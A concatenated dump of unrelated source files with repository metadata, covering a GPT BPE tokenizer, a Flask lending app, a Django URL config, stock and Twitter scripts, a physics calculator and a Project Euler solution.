VOCAB_NAME = 'vocab.json'
MERGES_NAME = 'merges.txt'
SPECIAL_TOKENS_NAME = 'special_tokens.txt'
def get_pairs(word):
"""
Return set of symbol pairs in a word.
word is represented as tuple of symbols (symbols being variable-length strings)
"""
pairs = set()
prev_char = word[0]
for char in word[1:]:
pairs.add((prev_char, char))
prev_char = char
return pairs
def text_standardize(text):
"""
fixes some issues the spacy tokenizer had on books corpus
also does some whitespace standardization
"""
text = text.replace('—', '-')
text = text.replace('–', '-')
text = text.replace('―', '-')
text = text.replace('…', '...')
text = text.replace('´', "'")
text = re.sub(r'''(-+|~+|!+|"+|;+|\?+|\++|,+|\)+|\(+|\\+|\/+|\*+|\[+|\]+|}+|{+|\|+|_+)''', r' \1 ', text)
text = re.sub(r'\s*\n\s*', ' \n ', text)
text = re.sub(r'[^\S\n]+', ' ', text)
return text.strip()
class OpenAIGPTTokenizer(object):
"""
BPE tokenizer. Peculiarities:
- lower case all inputs
- uses SpaCy tokenizer and ftfy for pre-BPE tokenization if they are installed, fallback to BERT's BasicTokenizer if not.
- argument special_tokens and function set_special_tokens:
can be used to add additional symbols (ex: "__classify__") to a vocabulary.
"""
@classmethod
def from_pretrained(cls, pretrained_model_name_or_path, cache_dir=None, *inputs, **kwargs):
"""
Instantiate a PreTrainedBertModel from a pre-trained model file.
Download and cache the pre-trained model file if needed.
"""
if pretrained_model_name_or_path in PRETRAINED_VOCAB_ARCHIVE_MAP:
vocab_file = PRETRAINED_VOCAB_ARCHIVE_MAP[pretrained_model_name_or_path]
merges_file = PRETRAINED_MERGES_ARCHIVE_MAP[pretrained_model_name_or_path]
special_tokens_file = None
else:
vocab_file = os.path.join(pretrained_model_name_or_path, VOCAB_NAME)
merges_file = os.path.join(pretrained_model_name_or_path, MERGES_NAME)
special_tokens_file = os.path.join(pretrained_model_name_or_path, SPECIAL_TOKENS_NAME)
if not os.path.exists(special_tokens_file):
special_tokens_file = None
else:
logger.info("loading special tokens file {}".format(special_tokens_file))
# redirect to the cache, if necessary
try:
resolved_vocab_file = cached_path(vocab_file, cache_dir=cache_dir)
resolved_merges_file = cached_path(merges_file, cache_dir=cache_dir)
except EnvironmentError:
logger.error(
"Model name '{}' was not found in model name list ({}). "
"We assumed '{}' was a path or url but couldn't find files {} and {} "
"at this path or url.".format(
pretrained_model_name_or_path,
', '.join(PRETRAINED_VOCAB_ARCHIVE_MAP.keys()),
pretrained_model_name_or_path,
vocab_file, merges_file))
return None
if resolved_vocab_file == vocab_file and resolved_merges_file == merges_file:
logger.info("loading vocabulary file {}".format(vocab_file))
logger.info("loading merges file {}".format(merges_file))
else:
logger.info("loading vocabulary file {} from cache at {}".format(
vocab_file, resolved_vocab_file))
logger.info("loading merges file {} from cache at {}".format(
merges_file, resolved_merges_file))
if pretrained_model_name_or_path in PRETRAINED_VOCAB_POSITIONAL_EMBEDDINGS_SIZE_MAP:
# if we're using a pretrained model, ensure the tokenizer wont index sequences longer
# than the number of positional embeddings
max_len = PRETRAINED_VOCAB_POSITIONAL_EMBEDDINGS_SIZE_MAP[pretrained_model_name_or_path]
kwargs['max_len'] = min(kwargs.get('max_len', int(1e12)), max_len)
# Instantiate tokenizer.
if special_tokens_file and 'special_tokens' not in kwargs:
special_tokens = open(special_tokens_file, encoding='utf-8').read().split('\n')[:-1]
else:
special_tokens = kwargs.pop('special_tokens', [])
tokenizer = cls(resolved_vocab_file, resolved_merges_file, special_tokens=special_tokens, *inputs, **kwargs)
return tokenizer
def __init__(self, vocab_file, merges_file, special_tokens=None, max_len=None):
try:
import ftfy
import spacy
self.nlp = spacy.load('en', disable=['parser', 'tagger', 'ner', 'textcat'])
self.fix_text = ftfy.fix_text
except ImportError:
logger.warning("ftfy or spacy is not installed using BERT BasicTokenizer instead of SpaCy & ftfy.")
self.nlp = BasicTokenizer(do_lower_case=True,
never_split=special_tokens if special_tokens is not None else [])
self.fix_text = None
self.max_len = max_len if max_len is not None else int(1e12)
self.encoder = json.load(open(vocab_file, encoding="utf-8"))
self.decoder = {v:k for k,v in self.encoder.items()}
merges = open(merges_file, encoding='utf-8').read().split('\n')[1:-1]
merges = [tuple(merge.split()) for merge in merges]
self.bpe_ranks = dict(zip(merges, range(len(merges))))
self.cache = {}
self.set_special_tokens(special_tokens)
def __len__(self):
return len(self.encoder) + len(self.special_tokens)
def set_special_tokens(self, special_tokens):
""" Add a list of additional tokens to the encoder.
The additional tokens are indexed starting from the last index of the
current vocabulary in the order of the `special_tokens` list.
"""
if not special_tokens:
self.special_tokens = {}
self.special_tokens_decoder = {}
return
self.special_tokens = dict((tok, len(self.encoder) + i) for i, tok in enumerate(special_tokens))
self.special_tokens_decoder = {v:k for k, v in self.special_tokens.items()}
if self.fix_text is None:
# Using BERT's BasicTokenizer: we can update the tokenizer
self.nlp.never_split = special_tokens
logger.info("Special tokens {}".format(self.special_tokens))
def bpe(self, token):
word = tuple(token[:-1]) + (token[-1] + '</w>',)
if token in self.cache:
return self.cache[token]
pairs = get_pairs(word)
if not pairs:
return token+'</w>'
while True:
bigram = min(pairs, key=lambda pair: self.bpe_ranks.get(pair, float('inf')))
if bigram not in self.bpe_ranks:
break
first, second = bigram
new_word = []
i = 0
while i < len(word):
try:
j = word.index(first, i)
new_word.extend(word[i:j])
i = j
                except ValueError:  # 'first' no longer occurs in the remainder
new_word.extend(word[i:])
break
if word[i] == first and i < len(word)-1 and word[i+1] == second:
new_word.append(first+second)
i += 2
else:
new_word.append(word[i])
i += 1
new_word = tuple(new_word)
word = new_word
if len(word) == 1:
break
else:
pairs = get_pairs(word)
word = ' '.join(word)
if word == '\n </w>':
word = '\n</w>'
self.cache[token] = word
return word
def tokenize(self, text):
""" Tokenize a string. """
split_tokens = []
if self.fix_text is None:
# Using BERT's BasicTokenizer
text = self.nlp.tokenize(text)
for token in text:
split_tokens.extend([t for t in self.bpe(token).split(' ')])
else:
# Using SpaCy & ftfy (original tokenization process of OpenAI GPT)
text = self.nlp(text_standardize(self.fix_text(text)))
for token in text:
split_tokens.extend([t for t in self.bpe(token.text.lower()).split(' ')])
return split_tokens
def convert_tokens_to_ids(self, tokens):
""" Converts a sequence of tokens into ids using the vocab. """
ids = []
if isinstance(tokens, str) or (sys.version_info[0] == 2 and isinstance(tokens, unicode)):
if tokens in self.special_tokens:
return self.special_tokens[tokens]
else:
return self.encoder.get(tokens, 0)
for token in tokens:
if token in self.special_tokens:
ids.append(self.special_tokens[token])
else:
ids.append(self.encoder.get(token, 0))
if len(ids) > self.max_len:
logger.warning(
"Token indices sequence length is longer than the specified maximum "
" sequence length for this OpenAI GPT model ({} > {}). Running this"
" sequence through the model will result in indexing errors".format(len(ids), self.max_len)
)
return ids
def convert_ids_to_tokens(self, ids, skip_special_tokens=False):
"""Converts a sequence of ids in BPE tokens using the vocab."""
tokens = []
for i in ids:
if i in self.special_tokens_decoder:
if not skip_special_tokens:
tokens.append(self.special_tokens_decoder[i])
else:
tokens.append(self.decoder[i])
return tokens
def decode(self, ids, skip_special_tokens=False, clean_up_tokenization_spaces=False):
"""Converts a sequence of ids in a string."""
tokens = self.convert_ids_to_tokens(ids, skip_special_tokens=skip_special_tokens)
out_string = ''.join(tokens).replace('</w>', ' ').strip()
if clean_up_tokenization_spaces:
out_string = out_string.replace('<unk>', '')
out_string = out_string.replace(' .', '.').replace(' ?', '?').replace(' !', '!').replace(' ,', ',').replace(' ,', ','
).replace(" n't", "n't").replace(" 'm", "'m").replace(" 're", "'re").replace(" do not", " don't"
).replace(" 's", "'s").replace(" t ", "'t ").replace(" s ", "'s ").replace(" m ", "'m "
).replace(" 've", "'ve")
return out_string
def save_vocabulary(self, vocab_path):
"""Save the tokenizer vocabulary and merge files to a directory."""
if not os.path.isdir(vocab_path):
logger.error("Vocabulary path ({}) should be a directory".format(vocab_path))
return
vocab_file = os.path.join(vocab_path, VOCAB_NAME)
merge_file = os.path.join(vocab_path, MERGES_NAME)
special_tokens_file = os.path.join(vocab_path, SPECIAL_TOKENS_NAME)
with open(vocab_file, 'w', encoding='utf-8') as f:
f.write(json.dumps(self.encoder, ensure_ascii=False))
index = 0
with open(merge_file, "w", encoding="utf-8") as writer:
writer.write(u'#version: 0.2\n')
for bpe_tokens, token_index in sorted(self.bpe_ranks.items(), key=lambda kv: kv[1]):
if index != token_index:
logger.warning("Saving vocabulary to {}: BPE merge indices are not consecutive."
" Please check that the tokenizer is not corrupted!".format(merge_file))
index = token_index
writer.write(' '.join(bpe_tokens) + u'\n')
index += 1
with open(special_tokens_file, 'w', encoding='utf-8') as writer:
            # sort by assigned index; the original sorted the keys by their
            # second character, scrambling the saved token order
            for token, _ in sorted(self.special_tokens.items(), key=lambda kv: kv[1]):
                writer.write(token + u'\n')
return vocab_file, merge_file, special_tokens_file
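# Dependency-free sketch of the symbol-pair step that drives bpe() above:
# build the word tuple with the "</w>" end-of-word marker exactly as bpe()
# does, then enumerate adjacent pairs (equivalent to get_pairs()).
def get_pairs_demo(token):
    word = tuple(token[:-1]) + (token[-1] + '</w>',)
    return set(zip(word, word[1:]))

print(sorted(get_pairs_demo("low")))
# [('l', 'o'), ('o', 'w</w>')]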
|
[
"hao.en0116@gmail.com"
] |
hao.en0116@gmail.com
|
e47a993956b0cf5a138d15c01e3ad44563245394
|
023167de90034d0ac4e3695db5d0fc419e298247
|
/flash_examples/serve/translation/inference_server.py
|
f8f9c8dbce012db0f244cc5b81026cd00ef424f8
|
[
"Apache-2.0"
] |
permissive
|
dlangerm/lightning-flash
|
9e66e90f86d597d362e5c307e391b623f509c092
|
892f7594fff40ebc4333b62a5c4e73b02549fb82
|
refs/heads/master
| 2023-08-06T22:11:56.467679
| 2021-09-29T11:00:22
| 2021-09-29T11:00:22
| 406,909,766
| 0
| 0
|
Apache-2.0
| 2021-09-15T20:04:16
| 2021-09-15T20:04:15
| null |
UTF-8
|
Python
| false
| false
| 754
|
py
|
# Copyright The PyTorch Lightning team.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from flash.text import TranslationTask
model = TranslationTask.load_from_checkpoint("https://flash-weights.s3.amazonaws.com/translation_model_en_ro.pt")
model.serve()
|
[
"noreply@github.com"
] |
dlangerm.noreply@github.com
|
0f3329dce80da79fcd9ee3bdafee4cb57796d80a
|
158bafd98b710ab36ef63055016ff2e085ea9b41
|
/index6m.py
|
5b4e5f3b76d29fd880093b89aef7328b1cc19d29
|
[] |
no_license
|
gestinf/StockScreeningScript
|
02b2f6647d78c8038223658ab375ef055fb34b28
|
69420a7dfe9a6b56bd7e5fce682dee1cf1362306
|
refs/heads/master
| 2023-02-08T16:42:03.105653
| 2021-01-03T18:50:27
| 2021-01-03T18:50:27
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 554
|
py
|
import yfinance as yf
import datetime as dt
import pandas as pd
def sixMonthIndex(tickers):
start = dt.datetime.today() - dt.timedelta(180)
end = dt.datetime.today()
cl_price = pd.DataFrame()
for ticker in tickers:
cl_price[ticker]= yf.download(ticker, start, end, period = "6mo")["Adj Close"]
finalList = cl_price.iloc[-1] / cl_price.iloc[0]
finalList.sort_values(ascending = False, inplace = True)
print("6 month Index")
print(finalList)
finalList = finalList[:len(finalList)//3]
return finalList
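# Offline sketch of the ranking step in sixMonthIndex(): last close divided by
# first close, sorted descending, top third kept. The prices are made up, so
# no network call is needed.
import pandas as pd

cl_demo = pd.DataFrame({"AAA": [10.0, 12.0], "BBB": [10.0, 9.0], "CCC": [10.0, 15.0]})
ratios = (cl_demo.iloc[-1] / cl_demo.iloc[0]).sort_values(ascending=False)
print(ratios.head(len(ratios) // 3))  # CCC    1.5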
|
[
"noreply@github.com"
] |
gestinf.noreply@github.com
|
2b1820b38378e49a3440992c21de43a88a98b68b
|
e2e2c0abaa3e3c861270fa2b920692a3ab86a8e0
|
/particle.py
|
b922f75391d388cc62946ef8c6c6435c33fd492f
|
[
"WTFPL"
] |
permissive
|
Super-Baleine/ENERGY
|
02eddb723b33044c973549033b6c68089df6d13c
|
cb5659a405bbac12a8dec77a624fbedf60ca028d
|
refs/heads/master
| 2020-09-14T15:00:45.467711
| 2016-11-13T21:33:55
| 2016-11-13T21:33:55
| 73,516,234
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,258
|
py
|
# -*- coding: utf-8 -*-
## THESE PROGRAMS ALLOW YOU TO CALCULATE
## THE ENERGY OF A LIQUID, A PARTICLE
## AND MAYBE SOME OTHER THINGS NOT CODED YET
##LICENSE : DO WHAT THE FUCK YOU WANT
## ./particle.py argv1 argv2 --> argv1: speed particle && argv2: particle's mass
import sys,math
args=len(sys.argv)
if args != 3:
    print("There aren't enough arguments, or there are too many.\
\nYou have to give exactly two arguments.\n\n\
The first argument is the speed of the particle\n\
And the second argument is the mass of the particle.\
\nExiting...")
sys.exit()
pass
def lorentzian_factor(v, c):
    # gamma = 1 / sqrt(1 - v^2 / c^2); the original used '*' where '**' was
    # intended, so it computed something else entirely
    y = 1 / ((1 - (v ** 2) / (c ** 2)) ** 0.5)
return float(y)
pass
def impulsion(y,m,v):
p=y*m*v
return float(p)
pass
def energy_computing(m, c, p):
m=math.pow(m, 2)
cc=math.pow(c, 4)
pp=math.pow(p, 2)
c=math.pow(c, 2)
EE=((m*cc)+pp*c)
EE=float(EE)
return EE
pass
v=float(sys.argv[1]) #v is the speed of the particle
m=float(sys.argv[2]) #mass of the particle
c=float(299792458) #Fiat lux!
y=lorentzian_factor(v,c)
y=float(y)
print("The lorentzian factor is : " + str(y))
p=impulsion(y,m,v)
print("The impulsion is : " + str(p))
energy=energy_computing(m,c,p)
print("E²=" + str(energy))
print("Therefore, we have :\n\
E="+ str(math.sqrt(float(energy))))
sys.exit()
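# Standalone sanity check for the corrected Lorentz factor above: for
# v = 0.6c the textbook value is gamma = 1.25.
c_demo = 299792458.0
v_demo = 0.6 * c_demo
gamma = 1 / ((1 - (v_demo ** 2) / (c_demo ** 2)) ** 0.5)
print(round(gamma, 6))  # 1.25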
|
[
"paul.feuvraux@protonmail.ch"
] |
paul.feuvraux@protonmail.ch
|
39871474d306c16ceeeb0dd60dee92f61d97dd91
|
2478ed986c07760558be1a13fd6f3aada6fc34dd
|
/bin/python-config
|
873d249504304d1d1601c3c50eac930c19521f1a
|
[] |
no_license
|
Catravine/trydjango19
|
ac5789d699277cd4252ad67e301427a240aecb3d
|
382b67c5a9686f5355af2c83a46aad71e992d22b
|
refs/heads/master
| 2021-01-12T05:07:58.170432
| 2017-01-02T21:31:46
| 2017-01-02T21:31:46
| 77,861,941
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,353
|
#!/Users/carolinecourtney/trydjango19/bin/python
import sys
import getopt
import sysconfig
valid_opts = ['prefix', 'exec-prefix', 'includes', 'libs', 'cflags',
'ldflags', 'help']
if sys.version_info >= (3, 2):
valid_opts.insert(-1, 'extension-suffix')
valid_opts.append('abiflags')
if sys.version_info >= (3, 3):
valid_opts.append('configdir')
def exit_with_usage(code=1):
sys.stderr.write("Usage: {0} [{1}]\n".format(
sys.argv[0], '|'.join('--'+opt for opt in valid_opts)))
sys.exit(code)
try:
opts, args = getopt.getopt(sys.argv[1:], '', valid_opts)
except getopt.error:
exit_with_usage()
if not opts:
exit_with_usage()
pyver = sysconfig.get_config_var('VERSION')
getvar = sysconfig.get_config_var
opt_flags = [flag for (flag, val) in opts]
if '--help' in opt_flags:
exit_with_usage(code=0)
for opt in opt_flags:
if opt == '--prefix':
print(sysconfig.get_config_var('prefix'))
elif opt == '--exec-prefix':
print(sysconfig.get_config_var('exec_prefix'))
elif opt in ('--includes', '--cflags'):
flags = ['-I' + sysconfig.get_path('include'),
'-I' + sysconfig.get_path('platinclude')]
if opt == '--cflags':
flags.extend(getvar('CFLAGS').split())
print(' '.join(flags))
elif opt in ('--libs', '--ldflags'):
abiflags = getattr(sys, 'abiflags', '')
libs = ['-lpython' + pyver + abiflags]
libs += getvar('LIBS').split()
libs += getvar('SYSLIBS').split()
# add the prefix/lib/pythonX.Y/config dir, but only if there is no
# shared library in prefix/lib/.
if opt == '--ldflags':
if not getvar('Py_ENABLE_SHARED'):
libs.insert(0, '-L' + getvar('LIBPL'))
if not getvar('PYTHONFRAMEWORK'):
libs.extend(getvar('LINKFORSHARED').split())
print(' '.join(libs))
elif opt == '--extension-suffix':
ext_suffix = sysconfig.get_config_var('EXT_SUFFIX')
if ext_suffix is None:
ext_suffix = sysconfig.get_config_var('SO')
print(ext_suffix)
elif opt == '--abiflags':
if not getattr(sys, 'abiflags', None):
exit_with_usage()
print(sys.abiflags)
elif opt == '--configdir':
print(sysconfig.get_config_var('LIBPL'))
|
[
"caroline@carolinecourtney.com"
] |
caroline@carolinecourtney.com
|
|
2c792ab5d17bbfbced2c1b30941ac5a73eb06cf3
|
6ec553e283ddb0bfdcec7cadca2c28afc473d41c
|
/daintree/urls.py
|
cbff6e40aaa1b6e17179d771da728d6253954477
|
[] |
no_license
|
rediumareanca/daintree
|
47acaa8d04d62bd7e0bff5807ef5621871d872db
|
af60988d84b14da8f1c2cc6b7aaf4dcb760fb012
|
refs/heads/master
| 2020-12-14T08:55:49.620700
| 2017-07-04T07:56:26
| 2017-07-04T07:56:26
| 95,537,532
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 845
|
py
|
"""daintree URL Configuration
The `urlpatterns` list routes URLs to views. For more information please see:
https://docs.djangoproject.com/en/1.10/topics/http/urls/
Examples:
Function views
1. Add an import: from my_app import views
2. Add a URL to urlpatterns: url(r'^$', views.home, name='home')
Class-based views
1. Add an import: from other_app.views import Home
2. Add a URL to urlpatterns: url(r'^$', Home.as_view(), name='home')
Including another URLconf
1. Import the include() function: from django.conf.urls import url, include
2. Add a URL to urlpatterns: url(r'^blog/', include('blog.urls'))
"""
from django.conf.urls import url
from django.contrib import admin
from main.views import HomeView
urlpatterns = [
url(r'^admin/', admin.site.urls),
url(r'^$', HomeView.as_view(), name="home")
]
|
[
"rediumareanca@ya.ru"
] |
rediumareanca@ya.ru
|
1aa85aa87001cc872500fac6fce0517c0467f91e
|
ac727c519f41b04bb7b8518b64f0c426c93ab3c4
|
/Training/lendy/lendy.py
|
5e988144b51f8ad45762e37b437955f82ba9a3bf
|
[] |
no_license
|
gjwall/python
|
82e704af4ddc993499cd81dedb4f81336a9de23a
|
a553b03556bf1ef01c63e1dfe3c3c2d0eefa95bd
|
refs/heads/master
| 2021-01-21T06:19:12.078150
| 2017-03-10T21:51:43
| 2017-03-10T21:51:43
| 83,212,868
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,779
|
py
|
#!C:\python36\python.exe
'''
Created on 10 Mar 2017
@author: Graham
'''
import sqlite3
import os
import lendydata
from flask import Flask, request, session, g, redirect, url_for, abort, \
render_template, flash
from werkzeug.utils import redirect
from flask.templating import render_template
app = Flask(__name__)
# Load default config and override config from environment variable
app.config.update(dict(
DATABASE = os.path.join(app.root_path, 'lendy.db'),
DEBUG = True,
SECRET_KEY = "nickknackpaddywhack",
USERNAME = "admin",
PASSWORD = "DONOTUSE"
))
app.config.from_envvar("LENDY_SETTINGS", silent = True)
def get_db():
''' Opens a new database connection if one does not exist for our current
request context (the g object helps with this task)'''
if not hasattr(g, "sqlite_db"):
lendydata.initDB()
g.sqlite_db = lendydata.db
return g.sqlite_db
@app.teardown_appcontext
def close_db(error):
    ''' Closes the database again at the end of the request. Note that the "g"
    object makes sure we only operate on the current request. '''
    if hasattr(g, "sqlite_db"):
lendydata.closeDB()
@app.route("/")
@app.route("/login", methods = ["GET", "POST"])
def login():
error = None
if request.method == "POST":
if request.form["username"] != app.config["USERNAME"]:
error = "Invalid username"
elif request.form["password"] != app.config["PASSWORD"]:
error = "Invalid password"
else:
session["logged_in"] = True
flash("You were logged in")
return redirect(url_for("show_inventory"))
return render_template("login.html", error = error)
@app.route('/inventory')
def show_inventory():
get_db()
allItems = lendydata.get_items()
inventory = [dict(zip(['name','description'],[item[1],item[2]]))
for item in allItems]
return render_template('items.html', items=inventory)
@app.route('/add', methods=['POST'])
def add_item():
if not session.get('logged_in'):
abort(401)
get_db()
ownerID = [row[0] for row in lendydata.get_members()
if row[1] == request.form['owner']]
try: ownerID = ownerID[0]
except IndexError:
# implies no owners match name
# should raise error/create new member
ownerID = 1 # use default member for now.
lendydata.insert_item(request.form['name'],
request.form['description'],
ownerID,
request.form['price'],
request.form['condition'])
flash('New entry was successfully posted')
return redirect(url_for('show_inventory'))
if __name__ == "__main__":
app.run()
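# A minimal smoke test (a sketch using the assumed default credentials from the
# config above; not part of the original app):
#   with app.test_client() as c:
#       rv = c.post("/login", data={"username": "admin", "password": "DONOTUSE"},
#                   follow_redirects=True)
#       assert rv.status_code == 200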
|
[
"gjwall@users.noreply.github.com"
] |
gjwall@users.noreply.github.com
|
daad0f74486a33b4879a5f91f2cee804d83863f7
|
6305a4ce6818083c3962d02de7f1471864bc9f49
|
/main.py
|
a19ed71fbd2b7c8b75c1c3eb7b9c6b1266702b4a
|
[
"MIT"
] |
permissive
|
marioyc/parse-ml-tweets
|
b79c5fa2819d9c48bf084648d55ed2671179f337
|
3bedf6c33682c85020dc07557b37cf9ccd3d9a63
|
refs/heads/master
| 2021-03-24T10:06:59.540849
| 2016-08-27T15:58:09
| 2016-08-27T15:58:09
| 66,718,089
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,056
|
py
|
import twitter
CONSUMER_KEY = ""
CONSUMER_SECRET = ""
ACCESS_TOKEN_KEY = ""
ACCESS_TOKEN_SECRET = ""
api = twitter.Api(consumer_key=CONSUMER_KEY,
consumer_secret=CONSUMER_SECRET,
access_token_key=ACCESS_TOKEN_KEY,
access_token_secret=ACCESS_TOKEN_SECRET)
USER_SCREEN_NAME = "StatMLPapers"
#user = api.GetUser(screen_name=USER_SCREEN_NAME)
#print(user.name + " : " + user.description + "\n")
def check(status):
return status.favorite_count + status.retweet_count >= 10
statuses = api.GetUserTimeline(screen_name=USER_SCREEN_NAME)
for s in statuses:
if check(s):
print(s.created_at, s.text, s.favorite_count, s.retweet_count)
for it in range(0,5):
print("")
max_id = statuses[-1].id
statuses = api.GetUserTimeline(screen_name=USER_SCREEN_NAME, max_id=max_id)
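    # GetUserTimeline's max_id is inclusive, so each new page begins with the
    # tweet that ended the previous one; a page of length 1 means nothing older
    # is left, otherwise the duplicated first status is dropped below.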
if len(statuses) == 1:
break
else:
statuses = statuses[1:]
for s in statuses:
if check(s):
print(s.created_at, s.text, s.favorite_count, s.retweet_count)
|
[
"ycmario@gmail.com"
] |
ycmario@gmail.com
|
13b2b9c390f93b4c58274db5a361c530327c3a2b
|
bbe74f172bf1f1cca1c77bd249c6f9a97ca897a4
|
/probs11-20/prob13.py
|
0e84fcee2846a2e45db91e51d3eefd773b8d39cf
|
[] |
no_license
|
kruthar/euler
|
5b32b7780502ff82e855c0c9670c91aff3938c5d
|
18a59531f2108074de3a7db29a77017663753abc
|
refs/heads/master
| 2021-01-13T13:19:54.723543
| 2016-02-22T14:53:45
| 2016-02-22T14:53:45
| 52,280,655
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 5,357
|
py
|
__author__ = 'kruthar'
'''
Large Sum
Work out the first ten digits of the sum of the following one-hundred 50-digit numbers.
37107287533902102798797998220837590246510135740250
46376937677490009712648124896970078050417018260538
74324986199524741059474233309513058123726617309629
91942213363574161572522430563301811072406154908250
23067588207539346171171980310421047513778063246676
89261670696623633820136378418383684178734361726757
28112879812849979408065481931592621691275889832738
44274228917432520321923589422876796487670272189318
47451445736001306439091167216856844588711603153276
70386486105843025439939619828917593665686757934951
62176457141856560629502157223196586755079324193331
64906352462741904929101432445813822663347944758178
92575867718337217661963751590579239728245598838407
58203565325359399008402633568948830189458628227828
80181199384826282014278194139940567587151170094390
35398664372827112653829987240784473053190104293586
86515506006295864861532075273371959191420517255829
71693888707715466499115593487603532921714970056938
54370070576826684624621495650076471787294438377604
53282654108756828443191190634694037855217779295145
36123272525000296071075082563815656710885258350721
45876576172410976447339110607218265236877223636045
17423706905851860660448207621209813287860733969412
81142660418086830619328460811191061556940512689692
51934325451728388641918047049293215058642563049483
62467221648435076201727918039944693004732956340691
15732444386908125794514089057706229429197107928209
55037687525678773091862540744969844508330393682126
18336384825330154686196124348767681297534375946515
80386287592878490201521685554828717201219257766954
78182833757993103614740356856449095527097864797581
16726320100436897842553539920931837441497806860984
48403098129077791799088218795327364475675590848030
87086987551392711854517078544161852424320693150332
59959406895756536782107074926966537676326235447210
69793950679652694742597709739166693763042633987085
41052684708299085211399427365734116182760315001271
65378607361501080857009149939512557028198746004375
35829035317434717326932123578154982629742552737307
94953759765105305946966067683156574377167401875275
88902802571733229619176668713819931811048770190271
25267680276078003013678680992525463401061632866526
36270218540497705585629946580636237993140746255962
24074486908231174977792365466257246923322810917141
91430288197103288597806669760892938638285025333403
34413065578016127815921815005561868836468420090470
23053081172816430487623791969842487255036638784583
11487696932154902810424020138335124462181441773470
63783299490636259666498587618221225225512486764533
67720186971698544312419572409913959008952310058822
95548255300263520781532296796249481641953868218774
76085327132285723110424803456124867697064507995236
37774242535411291684276865538926205024910326572967
23701913275725675285653248258265463092207058596522
29798860272258331913126375147341994889534765745501
18495701454879288984856827726077713721403798879715
38298203783031473527721580348144513491373226651381
34829543829199918180278916522431027392251122869539
40957953066405232632538044100059654939159879593635
29746152185502371307642255121183693803580388584903
41698116222072977186158236678424689157993532961922
62467957194401269043877107275048102390895523597457
23189706772547915061505504953922979530901129967519
86188088225875314529584099251203829009407770775672
11306739708304724483816533873502340845647058077308
82959174767140363198008187129011875491310547126581
97623331044818386269515456334926366572897563400500
42846280183517070527831839425882145521227251250327
55121603546981200581762165212827652751691296897789
32238195734329339946437501907836945765883352399886
75506164965184775180738168837861091527357929701337
62177842752192623401942399639168044983993173312731
32924185707147349566916674687634660915035914677504
99518671430235219628894890102423325116913619626622
73267460800591547471830798392868535206946944540724
76841822524674417161514036427982273348055556214818
97142617910342598647204516893989422179826088076852
87783646182799346313767754307809363333018982642090
10848802521674670883215120185883543223812876952786
71329612474782464538636993009049310363619763878039
62184073572399794223406235393808339651327408011116
66627891981488087797941876876144230030984490851411
60661826293682836764744779239180335110989069790714
85786944089552990653640447425576083659976645795096
66024396409905389607120198219976047599490197230297
64913982680032973156037120041377903785566085089252
16730939319872750275468906903707539413042652315011
94809377245048795150954100921645863754710598436791
78639167021187492431995700641917969777599028300699
15368713711936614952811305876380278410754449733078
40789923115535562561142322423255033685442488917353
44889911501440648020369068063960672322193204149535
41503128880339536053299340368006977710650566631954
81234880673210146739058568557934581403627822703280
82616570773948327592232845941706525094512325230608
22918802058777319719839450180888072429661980811197
77158542502016545090413245809786882778948721859617
72107838435069186155435662884062257473692284509516
20849603980134001723930671666823555245252804609722
53503534226472524250874054075591789781264330331690
'''
f = open('../data/data-prob13.txt', 'r')
total = 0
for line in f.readlines():
total += int(line)
print(str(total)[0:10])
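# Sanity check: 100 numbers each below 10**50 sum to less than 10**52, so the
# total has at most 52 digits and taking the first ten is always well defined.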
|
[
"kruthar@gmail.com"
] |
kruthar@gmail.com
|
95a31d8f1565fc8e7a66821758ac3eefce85f602
|
4fd0affb3da11fee35bc3d0e22a8acd3d6ebb159
|
/experiments/__main__.py
|
c3cb8147d37a224ae0709f3e8f6912f4222e356f
|
[
"MIT"
] |
permissive
|
hkrsnd/dilp-st
|
2876c4ed43414fe6fb5d8ab577038588dcccf1e9
|
54ef5b4a8393bf534493cbb85e8f5da80b51c14c
|
refs/heads/main
| 2023-04-19T14:01:30.624376
| 2021-05-24T11:46:56
| 2021-05-24T11:46:56
| 321,797,709
| 9
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,513
|
py
|
import sys
sys.path.append('datasets')
sys.path.append('datasets/append/')
sys.path.append('src/')
sys.path.append('experiments/')
from data_utils import DataUtils
from normal import normal_experiment
from noise import noise_experiment
from softor import softor_experiment
from step import step_experiment
import argparse
def main():
    print(sys.argv[1] + ' experiments running')
parser = argparse.ArgumentParser(description='experiments')
parser.add_argument('type', default='noise', type=str,
help='type of experiments [noise, step, softor, normal]')
parser.add_argument('name', default='append', type=str,
help='name of the problem')
parser.add_argument('lr', default=1e-2, type=float, help='learning rate')
parser.add_argument('epoch', default=10000, type=int,
help='epoch in training')
parser.add_argument('m', default=3, type=int,
help='the size of the solution')
parser.add_argument('T', default=5, type=int, help='infer step')
parser.add_argument('--noise_rate', default=0.00,
type=float, help='noise rate of training data')
args = parser.parse_args()
if args.type == 'noise':
noise_experiment(args)
elif args.type == 'normal':
normal_experiment(args)
elif args.type == 'step':
step_experiment(args)
elif args.type == 'softor':
softor_experiment(args)
if __name__ == "__main__":
main()
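# Example invocation (assumed values for the positional arguments):
#   python experiments noise append 0.01 10000 3 5 --noise_rate 0.05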
|
[
"microapple56@gmail.com"
] |
microapple56@gmail.com
|
ebe2a975ab70d15d04ef4c8c6afb5060da022d78
|
8a5f0ab7839a729867baf9be9919fb8ba89009df
|
/bad_compute.py
|
e04049579d86fc30afde4aa87bba3bdbc452b9df
|
[] |
no_license
|
jdk-maxim/action-test-repo
|
ecd079cc064a619e56df62139332edb60b7fd201
|
e23e22fc4a40b51f0a12eac893226516a6b7f635
|
refs/heads/master
| 2023-01-14T00:56:07.931588
| 2020-11-20T22:51:08
| 2020-11-20T22:51:08
| 302,100,610
| 0
| 0
